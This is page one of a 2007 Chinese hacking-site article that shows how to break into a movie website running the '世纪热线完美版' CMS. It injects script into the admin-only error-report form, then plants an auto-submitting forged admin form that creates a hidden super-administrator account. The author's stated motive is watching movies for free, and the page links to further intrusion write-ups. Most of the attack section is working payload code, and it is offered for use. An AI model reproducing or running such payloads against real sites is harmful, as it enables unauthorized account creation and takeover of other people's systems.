·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[组图]世纪热线完美版跨站漏洞提权入侵

热荐 ★★★★★

世纪热线完美版跨站漏洞提权入侵

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-4-16 7:37:34

06年就这样像3389离我而去，07年就像4489在迎接着我们。不知不觉又长了一岁。06年可以说是注入淡却的一年。不过新的技术也在增长。

跨站虽然算不上新的技术。但在国外也是非常重视的。其实跨站代码如果构造好的话可以干出很多事来的。这不，在网上逛到了一个电影网站。

心想如果把这个站拿下来不就可以看免费的电影了。(动机不太好呀^_^)。发现程序用的是："世纪热线全站程序完美版"于是去百度搜一下也没发有漏洞。那么就自己下回来慢慢研究吧。

可以说这套程序在注入方面防范的还不错。但是跨站方面好象就没有做到家了。经过仔细的查找，终于被我找到了一点软胁。首先我们先注册个用户。一般电影网站都提供影片报错的页面。这个也不例外。我们在首页随便点击一个影片。下面有个报告错误。点一下之后会打开一个页面。

因为这个报告错误只有管理员能看，我们在报告错误里写上"<script>alert("樱花找漏洞了")</script>"，如图1所示。

点开始报告，我们再去后台的电影管理/错误报告去看一下，跨站代码被成功执行了。如图2所示。

既然这个能执行，我们在来构造一些特殊的代码吧。后台有个添加管理员的，我们先来看看它的代码是怎么实现的，添加管理员的关键代码如下：

以下是引用片段：

<form method="post" action="saveuser1.asp" name="form1" onsubmit="javascript:return check();">
<table width="396" border="0" cellspacing="1" cellpadding="0">
<tr bgcolor="#0099FF">
<td height="25" width="392">
<div align="center">
<font size="2">新增管理员</font></div>
</td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<div align="center">
<font size="2">用户名　 <input type="text" name="username" size="20">
</font>
</div>
</td>
<td height="30" style="color: black; border-style: none" width="138">　</td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<div align="center">
<font size="2">初始密码　 <input type="password" name="newpin" size="20">
</font>
</div>
</td>
<td height="30" style="color: black; border-style: none" width="138">
<span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<div align="center">
<font size="2">确认密码　 <input type="password" name="re_newpin" size="20">
</font>
</div>
</td>
<td height="30" style="color: black; border-style: none" width="138">
<span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<p align="center"><span lang="zh-cn"> </span>权限设置 <span lang="zh-cn"> 
</span><select size="1" name="flag">
<option selected value="4">====无管理权限====</option>
<option value="3">====初级管理员====</option>
<option value="2">====高级管理员====</option>
<option value="1">====超级管理员====</option>
</select></td>
<td height="30" style="color: black; border-style: none" width="138">　</td>
</tr>
</table>
<p><input type="submit" name="Submit" value="确定"> </p>
</form>

其实这个我们只在稍稍改动一下就可以了，改好的代码如下：

<form method="post" action="http://127.0.0.1/admin/saveuser1.asp">
<table width="396" border="0" cellspacing="1" cellpadding="0">
<tr bgcolor="#0099FF">
<td height="25" width="392">
<div align="center">
<font size="2">新增管理员</font></div>
</td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<div align="center">
<font size="2">用户名　 <input type="text" name="username" size="20" value="hacklu119"> '添加管理员名字
</font>
</div>
</td>
<td height="30" style="color: black; border-style: none" width="138">　</td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<div align="center">
<font size="2">初始密码　 <input type="password" name="newpin" size="20" value="hack11911"> '添加管理员密码
</font>
</div>
</td>
<td height="30" style="color: black; border-style: none" width="138">
<span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<div align="center">
<font size="2">确认密码　 <input type="password" name="re_newpin" size="20" value="hack11911"> '确认管理员密码
</font>
</div>
</td>
<td height="30" style="color: black; border-style: none" width="138">
<span lang="zh-cn"><font size="2">数字+字母10位以上</font></span></td>
</tr>
<tr>
<td height="30" style="color: black; border-style: none" width="253">
<p align="center"><span lang="zh-cn"> </span>权限设置 <span lang="zh-cn"> 
</span><select size="1" name="flag">
<option selected value="1">====无管理权限====</option> '设置为超级管理员,注意这里是1
<option value="3">====初级管理员====</option>
<option value="2">====高级管理员====</option>
<option value="1">====超级管理员====</option>
</select></td>
<td height="30" style="color: black; border-style: none" width="138">　</td>
</tr>
</table>
<p><input type="submit" name="Submit" value="确定"> </p>

<p>　</p>
<p align="center">
<script language="javascript"> '用javascript脚本叫程序自动运行
this.document.forms[0].submit()
</script>
</div>
</form>

最重要的就是action后的路径和最后自动运行的脚本，路径大家一定要对上。

[1] [2] 下一页

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：对讯时新闻发布系统的艰难突破

下一篇文章：轻易绕过PhpWind论坛程序高危漏洞攻防详解

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26
BBSXP2008存在后台注射漏洞	02-19
Discuz! 6 后台拿Shell的方法	02-17